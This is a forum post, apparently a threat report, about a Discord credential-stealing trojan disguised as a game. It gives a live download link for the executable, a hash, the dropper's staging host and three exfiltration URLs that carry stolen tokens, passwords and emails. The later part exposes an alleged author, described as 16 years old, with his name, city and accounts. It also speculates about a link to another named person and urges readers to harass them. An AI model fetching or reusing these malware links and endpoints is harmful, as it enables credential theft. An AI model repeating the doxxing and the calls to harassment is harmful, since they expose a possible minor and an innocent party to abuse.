"Honest feedback on a game I made" TROJAN

Popup - http://cdn.discordapp.com/attachments/911128608729358346/911558951152255016/Sniper_Attack.exe

VirusTotal - VirusTotal - File - e5994d21ed90e936d1fc54a6d12ee45da88ed4e83542be4790011cb969d7087f

Program contains the HEUR:Trojan-PSW.Win32.Disco.gen trojan and functions as a Discord tokener.

Yay, there’s another contester to the “You think your skidded malware can hack everybody” show?

It’s another PrimeFA sample AFAIK. I am too poor to do proper dynamic analysis on my HW and from the looks of it it’s skidded anyways. Shame on AVs on not even detecting a literally open source skidded grabber. Boo !
Anyways yes, uploading ALL of their stuff to VT, just because they told me not to.

Infection detection:
HTTP: http://primefa.xyz/injection sample grabs the grabber from here (to avoid detection) → exe literally just a dropper
For now it drops the credentials to https://p9iprsfdr7.execute-api.us-east-2.amazonaws.com/default/EmailChanged?token=${o}&auth=${auth}&psd=${psw}&email={email} and
https://1m3bmndg3i.execute-api.us-east-2.amazonaws.com/default/Logged?token=${o}&auth=${auth}&psd=${psw} and
https://sd8bzuhwv6.execute-api.us-east-2.amazonaws.com/default/PassChanged?token=${o}&auth=${auth}&psd=${psw}&oldpsd=${e}
idk what the fuck the auth parameter is supposed to be but maybe its the string “__AUTH__”

The devs are cocky enough to leave you an invite to a Discord server when you attempt to connect to these servers if your packets are too sus

This server conversations speaks for itself: obrazekobrazek

Hmm love my [[Premium]] (education purpose) skidded malware

yah it’s a resell of an open-source trash grabber and even the original author hates this guy.

Looks like this guy got dropped before I even got here so most info is stale as a bread. But please give this benchod a run for the buck :slight_smile:

INFO:
[email protected]
[email protected]
Nithish#5099 - NithishCodez
https://twitter.com/nithish_pravin/ and NithishCodez (Nithish Pravin) · GitHub
https://nithishpravin.xyz/ - Nithish Pravin, 16yo, Chennai, Tamil Nadu - likely a persona
Coding With Nithish - YouTube

SPECULATION: might be an alt of khalby78 and I have researched that thoroughly (and archived EVERYTHING in case I am right) but there’s a possibility that this acc is a decoy designed to hurt the lad (who seems to be living quite a public life on the Internet) so I will leave that up to when evidence linking the two properly emerges.

P. S. If you wanna go bother the actual devs of this original skidware, go to PirateStealer never die (tos fanclub)